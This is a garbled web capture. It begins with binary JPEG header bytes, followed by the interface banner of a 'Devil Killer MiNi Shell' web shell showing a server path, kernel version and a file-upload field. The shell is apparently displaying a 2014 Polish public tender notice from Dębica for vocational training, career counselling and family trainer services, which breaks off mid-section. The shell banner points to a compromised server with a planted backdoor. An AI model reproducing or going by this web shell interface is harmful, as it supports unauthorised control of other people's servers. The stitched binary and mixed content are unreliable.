JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140314/87418-N-2014.html

<p class="kh_header"><b>Dębica: Organizacja i przeprowadzenie szkoleń zawodowych, doradztwa zawodowego oraz wykonanie usługi treningu umiejętności psychospołecznych- trener rodzinny, w ramach realizacji projektu systemowego - Czas na aktywność w Gminie Dębica- Kontrakty socjalne.</b><br>
<b>Numer ogłoszenia: 87418 - 2014; data zamieszczenia: 14.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Dębicy , ul. Batorego 13, 39-200 Dębica, woj. podkarpackie, tel. 014 6803333, faks 014 6803333.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugdebica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń zawodowych, doradztwa zawodowego oraz wykonanie usługi treningu umiejętności psychospołecznych- trener rodzinny, w ramach realizacji projektu systemowego - Czas na aktywność w Gminie Dębica- Kontrakty socjalne..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.	Opis  przedmiotu  zamówienia : 


1)  Część I zamówienia : Kurs Kucharz - ciastkarz dla 23 osób ( 23 kobiet + opieka nad 4 dzieci w wieku od 3 do 7 lat),
     a)  ilość osób do przeszkolenia: 23 osoby ( 23 kobiety),
     b)  ilość dzieci do zapewnienia opieki: 4 dzieci
     c)  minimalna liczba godzin szkolenia :  200 godzin dydaktycznych w tym 40 godz. teoretycznych
          i 160 godz. praktycznych (1 godzina dydaktyczna to 45 minut),
     d)  maksymalny okres trwania szkolenia -  6 tygodni,
     e)  godziny realizacji szkolenia - 8.00- 19.00 - maksymalnie 8 godzin dziennie,
     f)  miejsce realizacji szkolenia - Dębica,
     g)  termin realizacji szkolenia:  od kwietnia 2014 do 06 czerwca  2014 r.,


Wykonawca szkolenia zapewnia :

1) przeprowadzenie kursu zawodowego kucharz- ciastkarz przez osoby posiadające odpowiednie kwalifikacje zawodowe wymagane przepisami prawa,

2) salę wykładową, - sprzęt dydaktyczny, - materiały szkoleniowe dla uczestników, - warunki w czasie szkoleń zgodne z przepisami BHP, - wyżywienie: ciastka, kawa, herbata, woda mineralna, ciepły posiłek: drugie danie, - odzież robocza, 





3) opiekę nad dziećmi (4 dzieci w wieku od trzeciego do siódmego roku życia) uczestniczek projektu, biorących udział w szkoleniach, - posiłek, napoje, nadzór nad zabawami, animacje tych zabaw, zabawki, gry,

4) warunki w miejscu przebywania dzieci  zgodne z przepisami BHP, lokal winien spełniać wymagania określone w przepisach techniczno-budowlanych oraz przepisach o ochronie przeciwpożarowej dla kategorii zagrożenia ludzi ZL II, - pomieszczenie: powierzchnia dla dzieci od 3-5 dzieci wynosi co najmniej 16 m2, w przypadku liczby dzieci większej niż 5 powierzchnia ulega odpowiedniemu zwiększeniu na każde kolejne dziecko  o co najmniej 2 m2,

5) czas opieki nad dziećmi maksymalnie 8 godzin dziennie, - gry i zabawy adekwatne do wieku i zainteresowań i sprawności intelektualnej i psychoruchowej  dziecka, 

6) wykwalifikowaną kadrę do opieki nad dziećmi - wykształcenie wyższe w kierunku pedagogika przedszkolna i wczesnoszkolna z zakresu wychowania przedszkolnego i nauczania początkowego- uprawniająca do opieki nad dziećmi w wieku od 3 do 7 lat, osoba do opieki nad dziećmi winna posiadać minimum 1 roczne doświadczenie zawodowe w  zakresie objętym zamówieniem,

7) umieszczenie w sali szkoleniowej informacji o współfinansowaniu szkolenia przez Europejski Fundusz Społeczny z logo EFS i realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, 

8)  pokrycie kosztów niezbędnych badań lekarskich uczestników szkolenia,

9)  ubezpieczenie od następstw nieszczęśliwych wypadków uczestniczek szkolenia oraz ich dzieci  
    (w drodze na szkolenia, w trakcie szkolenia oraz w drodze powrotnej ze szkolenia),

10) Szkolenia mają zakończyć się oceną zdobytych umiejętności oraz wydaniem certyfikatu o ukończeniu szkolenia zgodnie z obowiązującymi w tym zakresie przepisami (Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych(Dz. U. z 2006 r. Nr 31 poz. 216). Wydane certyfikaty muszą zawierać logotypy Programu Operacyjnego Kapitał Ludzki oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, 

11) po  wykonaniu zadania (ukończeniu szkolenia) przedstawia Zamawiającemu listy obecności uczestników, plany zajęć, kserokopie rejestru wydanych certyfikatów, oraz kserokopie wydanych certyfikatów wraz z potwierdzeniem odbioru certyfikatu przez uczestnika szkolenia,  

12)  zwrot kosztów przejazdu uczestnika oraz dziecka (jeżeli dotyczy) z miejsca zamieszkania do Dębicy i powrót na podstawie najtańszego środka transportu - cena biletu,

13) W przypadku braku dojazdu do miejsca szkolenia lub gdy szkolenie będzie się odbywać poza terenem Dębicy - Wykonawca zapewni dojazd uczestników projektu do miejsca szkolenia i powrót oraz dojazd dzieci do miejsca opieki i powrót.  Przewóz dzieci z rodzicami z uzgodnionego miejsca do miejsca odbywania się szkoleń (jeżeli opieka nad dzieckiem odbywać się będzie poza budynkiem szkolenia) oraz przywóz dzieci o określonej porze na zakończenie szkolenia. 
Dopuszcza się możliwość przewozu dzieci z rodzicami z uzgodnionego miejsca do miejsca w którym będzie się odbywać opieka nad dziećmi i dowóz rodziców na miejsce szkolenia, a po zakończeniu szkolenia w danym dniu  przejazd uczestniczek  po dzieci i dowiezienie do uzgodnionego miejsca powrotu.











2) Część II zamówienia:  Kurs kasy fiskalnej z gospodarką magazynową dla 23 osób 
( 23 kobiety + opieka nad 5 dzieci w wieku 3 - 7 lat) , 
    a)  ilość osób do przeszkolenia: 23 osoby ( 23 kobiety ) ,
    b)  ilość dzieci do zapewnienia opieki: 5 dzieci
    c)  minimalna liczba godzin szkolenia - 78 godzin dydaktycznych w tym 49 godz. teoretycznych 
         i 29 godz. praktycznych  (1 godzina dydaktyczna to 45 minut)
    d)  maksymalny okres trwania szkolenia-  2 tygodnie
    e)  godziny realizacji szkolenia - 8.00- 19.00 maksymalnie 8 godzin dziennie
    f)   miejsce realizacji szkolenia - Dębica
    g)  termin realizacji szkolenia :  do 25 czerwiec  2014 r.

Wykonawca szkolenia zapewnia :

1)  przeprowadzenie kursu zawodowego - Kurs kasy fiskalnej z gospodarką magazynową- przez osoby posiadające odpowiednie kwalifikacje zawodowe wymagane przepisami prawa,

2) salę wykładową, - sprzęt dydaktyczny, - materiały szkoleniowe dla uczestników , - warunki w czasie szkoleń zgodne z przepisami BHP, - wyżywienie: ciastka , kawa, herbata, woda mineralna, ciepły posiłek: drugie danie, - odzież robocza, 

3) opiekę nad dziećmi (5 dzieci w wieku od trzeciego do siódmego roku życia) uczestniczek projektu, biorących udział w szkoleniach, - posiłek, napoje, nadzór nad zabawami, animacje tych zabaw, zabawki, gry,

4) warunki w miejscu przebywania dzieci  zgodne z przepisami BHP, lokal winien spełniać wymagania określone w przepisach techniczno-budowlanych oraz przepisach o ochronie przeciwpożarowej dla kategorii zagrożenia ludzi ZL II, - pomieszczenie: powierzchnia dla dzieci od 3-5 dzieci wynosi co najmniej 16 m2, w przypadku liczby dzieci większej niż 5 powierzchnia ulega odpowiedniemu zwiększeniu na każde kolejne dziecko  o co najmniej 2 m2,

5) czas opieki nad dziećmi maksymalnie 8 godzin dziennie, - gry i zabawy adekwatne do wieku i zainteresowań dziecka, 

6) wykwalifikowaną kadrę do opieki nad dziećmi - wykształcenie wyższe w kierunku pedagogika przedszkolna i wczesnoszkolna z zakresu wychowania przedszkolnego - uprawniająca do opieki nad dziećmi w wieku od 3 do 7 lat, osoba do opieki nad dziećmi winna posiadać minimum 1 roczne doświadczenie zawodowe w  zakresie objętym zamówieniem,

7) umieszczenie w sali szkoleniowej informacji o współfinansowaniu szkolenia przez Europejski Fundusz Społeczny z logo EFS i realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, 

8)  pokrycie kosztów niezbędnych badań lekarskich uczestników szkolenia,

9)  ubezpieczenie od następstw nieszczęśliwych wypadków uczestniczek szkolenia oraz ich dzieci  (w drodze na szkolenia, w trakcie szkolenia oraz w drodze powrotnej ze szkolenia). 

10) Szkolenia mają zakończyć się oceną zdobytych umiejętności oraz wydaniem certyfikatu o ukończeniu szkolenia zgodnie z obowiązującymi w tym zakresie przepisami (Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31 poz. 216). Wydane certyfikaty muszą zawierać logotypy Programu Operacyjnego Kapitał Ludzki oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, 

11) po  wykonaniu zadania (ukończeniu szkolenia) przedstawia Zamawiającemu listy obecności uczestników, plany zajęć, kserokopie rejestru wydanych certyfikatów, oraz kserokopie wydanych certyfikatów wraz z potwierdzeniem odbioru certyfikatu przez uczestnika szkolenia, opinię na temat każdego uczestnika, 



12)  zwrot kosztów przejazdu uczestnika oraz dziecka (jeżeli dotyczy) z miejsca zamieszkania do Dębicy i powrót na podstawie najtańszego środka transportu - cena biletu,

13) W przypadku braku dojazdu do miejsca szkolenia lub gdy szkolenie będzie się odbywać poza terenem Dębicy - Wykonawca zapewni dojazd uczestników projektu do miejsca szkolenia i powrót oraz dojazd dzieci do miejsca opieki i powrót.  Przewóz dzieci z rodzicami z uzgodnionego miejsca do miejsca odbywania się szkoleń (jeżeli opieka nad dzieckiem odbywać się będzie poza budynkiem szkolenia) oraz przywóz dzieci o określonej porze na zakończenie szkolenia. 
Dopuszcza się możliwość przewozu dzieci z rodzicami z uzgodnionego miejsca do miejsca w którym będzie się odbywać opieka nad dziećmi i dowóz rodziców na miejsce szkolenia, a po zakończeniu szkolenia w danym dniu  przejazd uczestniczek  po dzieci i dowiezienie do uzgodnionego miejsca powrotu.



3) Część III zamówienia :  Kurs magazyniera z obsługą wózków widłowych dla 1 osoby 
    ( 1 mężczyzna ) .

    a)  ilość osób do przeszkolenia : 1 osoba (1 mężczyzna) ,
    b)  minimalna liczba godzin szkolenia - 69 godzin dydaktycznych w tym 54 godz. teoretyczne 
         i 15 godz. praktycznych (1 godzina dydaktyczna to 45 minut)
    c)  maksymalny okres trwania szkolenia-  2 tygodnie
    d)  godziny realizacji szkolenia - 8.00- 19.00 maksymalnie 8 godzin dydaktycznych dziennie
    e)  miejsce realizacji szkolenia - Dębica
    f)   termin realizacji szkolenia :  kwiecień -  30 maj 2014 r.

Wykonawca szkolenia zapewnia :

1)  przeprowadzenie kursu zawodowego magazyniera z obsługą wózków widłowych przez osoby posiadające odpowiednie kwalifikacje zawodowe wymagane przepisami prawa,
2) salę wykładową, - sprzęt dydaktyczny, - materiały szkoleniowe dla uczestników , - warunki w czasie szkoleń zgodne z przepisami BHP, - wyżywienie: ciastka, kawa, herbata, woda mineralna, ciepły posiłek: drugie danie, - odzież robocza, 
3) umieszczenie w sali szkoleniowej informacji o współfinansowaniu szkolenia przez Europejski Fundusz Społeczny z logo EFS i realizowanego w ramach Programu Operacyjnego Kapitał Ludzki. 
3) pokrycie kosztów niezbędnych badań lekarskich uczestników szkolenia,
4)  ubezpieczenie od następstw nieszczęśliwych wypadków uczestników szkolenia  (w drodze na szkolenia, w trakcie szkolenia oraz w drodze powrotnej ze szkolenia). 
5) Szkolenia mają zakończyć się oceną zdobytych umiejętności oraz wydaniem certyfikatu o ukończeniu szkolenia zgodnie z obowiązującymi w tym zakresie przepisami (Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216).Wydane certyfikaty muszą zawierać logotypy Programu Operacyjnego Kapitał Ludzki oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. 
6) po  wykonaniu zadania (ukończeniu szkolenia) przedstawia Zamawiającemu listy obecności uczestników, plany zajęć, kserokopie rejestru wydanych certyfikatów, oraz kserokopie wydanych certyfikatów wraz z potwierdzeniem odbioru certyfikatu przez uczestnika szkolenia, opinię na temat każdego uczestnika, 
7) zwrot kosztów przejazdu uczestnika z miejsca zamieszkania do Dębicy i powrót na podstawie najtańszego środka transportu - cena biletu.
8) w przypadku braku dojazdu do miejsca szkolenia lub gdy szkolenie będzie się odbywać poza terenem Dębicy Wykonawca zapewni dojazd uczestników projektu do miejsca szkolenia i powrót.
10) posiadanie aktualnych, okresowych badań technicznych dla wózków widłowych na których prowadzone jest szkolenie.







4) Część IV zamówienia :  Doradztwo zawodowe dla 26 osób (25 kobiet + 1 mężczyzna) 

   a)  ilość osób do przeszkolenia - 26 osób (25 kobiet + 1 mężczyzna)
   b)  łączna ilość godzin: 28 godzin
    - doradztwo zawodowe indywidualne w ilości 1 godzina dydaktyczna na 1 osobę przed rozpoczęciem
      szkoleń (1 godzina dydaktyczna to 45 minut)
    - doradztwo zawodowe grupowe (Warsztaty Aktywnego Poszukiwania Pracy ) w ilości 2 godziny
     dydaktyczne na grupę po zakończeniu szkoleń (1 godzina dydaktyczna to 45 minut).
    c) czas trwania szkolenia - przed rozpoczęciem szkoleń 1 godzina dydaktyczna i po zakończeniu
         szkoleń  2 godziny dydaktyczne (1 godzina dydaktyczna to 45 minut)
   d)  godziny realizacji szkolenia - 8.00-19.00 maksymalnie 10 godzin dydaktycznych dziennie
   e)  miejsce realizacji szkolenia - Dębica
   f)  termin realizacji szkolenia :      kwiecień 2014 r.  - doradztwo indywidualne,
                                                       październik -30 listopad 2014 r. - doradztwo grupowe


Celem usługi jest zaktywizowanie osób bezrobotnych poprzez podniesienie świadomości w zakresie mechanizmów rynku pracy, dostarczenie kompetencji zawodowych poszukiwanych na lokalnym rynku pracy a w szczególności ; - kwalifikacja do kursów zawodowych, -podniesienie wiedzy w zakresie mechanizmów i dynamiki rynku pracy, - metody poszukiwania pracy, - zdobycie umiejętności analizy swoich mocnych i słabych stron, -zdobycie umiejętności prowadzenia rozmowy kwalifikacyjnej, -zdobycie umiejętności przygotowania i pisania listu motywacyjnego, życiorysu zawodowego (CV), kwestionariusza osobowego, -poznanie własnych praw związanych z rynkiem pracy.

Wykonawca doradztwa zawodowego zapewnia:

1) sprzęt dydaktyczny, 
2) materiały szkoleniowe dla uczestników ,
3) warunki zgodne z przepisami BHP, 
4) po  wykonaniu zadania przedłożyć Zamawiającemu listy obecności uczestników, karty pracy, opinię na temat każdego uczestnika. 
Dopuszcza się możliwość wykonania doradztwa zawodowego w budynku Urzędu Gminy w Dębicy na  sali narad   (po wcześniejszym uzgodnieniu terminu) .

Wykonawca gwarantuje wykonanie czynności doradztwa zawodowego przez osobę posiadającą licencję zawodową doradcy zawodowego.
Zamawiający wymaga, aby osoba wykonująca czynności doradztwa zawodowego posiadała minimum licencję doradcy zawodowego pierwszego stopnia (zgodnie z art. 94 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy Dz. U. z 2008 r. Nr 69 poz. 415 z późn.zm.)


5) Część V  zamówienia : Treningi umiejętności psychospołecznych z trenerem rodzinnym dla 7 rodzin

    a) ilość rodzin do przeprowadzenia treningów : 7 rodzin
    b) czas realizacji - od sierpnia do  października 2014 r.
    c) godziny realizacji - 8.00 - 19.00 maksymalnie 3 godziny dziennie
    d) miejsce realizacji - w miejscu zamieszkania rodzin lub/i w siedzibie Zamawiającego

Trener rodzinny dla 7 rodzin w ilości 10 godzin na 1 rodzinę (indywidualne i grupowe) - łączna ilość godzin: 70 ;
Rodzaj treningów i ilość godzin zostanie przeanalizowana i dopasowana przez trenera rodzinnego w trakcie realizacji pod kątem danej rodziny oraz rodzaju problemów, w związku z czym dopuszczalne jest wykonanie usługi w przeliczeniu na 1 rodzinę zarówno:
 -  1 godzina treningów indywidualnych + 9 godzin treningów grupowych,  
 -   jak i  1 godzina treningów grupowych i 9 godzin treningów indywidualnych.

Celem usługi jest podniesienie kompetencji psychospołecznych rodzin zagrożonych wykluczeniem społecznym a w szczególności:
- trening zastępowania agresji,
- trening radzenia sobie ze stresem,
- trening rozwiązywania sytuacji konfliktowych, 
- trening komunikacji, 
- trening umiejętności wychowawczych dla rodziców, 
- trening autoprezentacji, wizerunku, budowania autorytetu ;

Warsztaty psychospołeczne winny  obejmować:
- podniesienie poziomu motywacji, - samooceny, - poczucia własnej wartości; -poprawy  wizerunku,- poprawy komunikacji interpersonalnej, - kształtowania zachowań asertywnych, - radzenia sobie w sytuacjach problemowych, - budowanie wizerunku , autoprezentacja, budowanie autorytetu, - zarządzanie czasem (sobą w czasie), planowanie, organizowanie.

Wykonawca treningów umiejętności psychospołecznych zapewnia:

  1) sprzęt dydaktyczny, 
  2) materiały szkoleniowe dla uczestników, 
  3) warunki zgodne z przepisami BHP.
  4) po  wykonaniu zadania przedłożyć Zamawiającemu listy obecności uczestników, karty pracy, opinię na temat każdego uczestnika. 

Wykonawca gwarantuje wykonanie treningów  umiejętności  psychospołecznych przez osobę posiadającą odpowiednie (zgodnie z obowiązującymi przepisami prawa) przygotowanie zawodowe.
Zamawiający wymaga aby osoba wykonująca czynności treningów  umiejętności  psychospołecznych posiadała minimum wykształcenie wyższe w  kierunku:
- pedagogika lub, - psychologia lub,- socjologia lub, - nauki o rodzinie lub, - praca socjalna, 
potwierdzone odpowiednim dyplomem..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje realizację zamówień uzupełniających, o których mowa w art. 67 
      ust.1 pkt 6 ustawy Pzp stanowiących nie więcej niż 20% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla wszystkich Części zamówienia: 
Zamawiający uzna, że warunek posiadania uprawnień do wykonywania określonej działalności lub czynności  jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części 1 zamówienia: 
Zamawiający uzna, że warunek posiadania  wiedzy i doświadczenia jest spełniony, jeżeli Wykonawca :
1)	złoży wraz  z ofertą Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 3 do SIWZ), oraz 
2)	Wykaże , że w okresie ostatnich 3 lat przed upływem terminu składania ofert, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje  minimum 1 usługę szkoleniową polegającą na organizacji i przeprowadzeniu szkolenia zawodowego w zawodzie:
a)	Kucharz-ciastkarz dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia, lub ,
b)	Kucharz dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia, lub 
c)	Ciastkarz dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia, lub 
d)	Cukiernik dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia,

- wraz z podaniem wartości usług, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączy dowody, czy usługi te zostały wykonane lub są wykonywane należycie.

W przypadku oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego - art.23 ust.2 ustawy Pzp,  oceniana będzie ich łączna wiedza i doświadczenie.

Dokumentami  potwierdzającymi spełnianie opisanego warunku posiadania wiedzy i doświadczenia jest : 
- Złożone Oświadczenie w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 2 do SIWZ) oraz 
- Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług. 
   
Z złożonego wykazu głównych  usług winno jednoznacznie wynikać wykonanie, a w przypadku świadczeń okresowych lub ciągłych wykonywanie: co najmniej 1 usługi szkoleniowej  polegającej na organizacji i przeprowadzeniu szkolenia zawodowego w zawodzie:
      a)  Kucharz-ciastkarz dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia, lub ,
b)  Kucharz dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia, lub 
      c)   Ciastkarz dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia, lub 
      d)  Cukiernik dla minimum 15 osób wraz z opieką dla minimum 3 dzieci uczestników szkolenia

Należy konkretnie wskazać przedmiot usługi, nazwę , podmiot na rzecz którego usługa została wykonana lub jest wykonywana, wykonawcę, rodzaj wykonywanej usługi, datę wykonania i przede wszystkim podać wartość usługi.
Do wykazu usług należy załączyć  dowód,  potwierdzający czy usługi zostały wykonane lub są wykonywane należycie. 

Zgodnie z treścią Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013 r. poz. 231) , dowodami o których mowa powyżej mogą być:
- poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
- oświadczenie wykonawcy- jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
Dla Części 2 zamówienia :
Zamawiający uzna, że warunek posiadania  wiedzy i doświadczenia jest spełniony, jeżeli Wykonawca :
1) złoży wraz  z ofertą Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 3 do SIWZ), oraz 
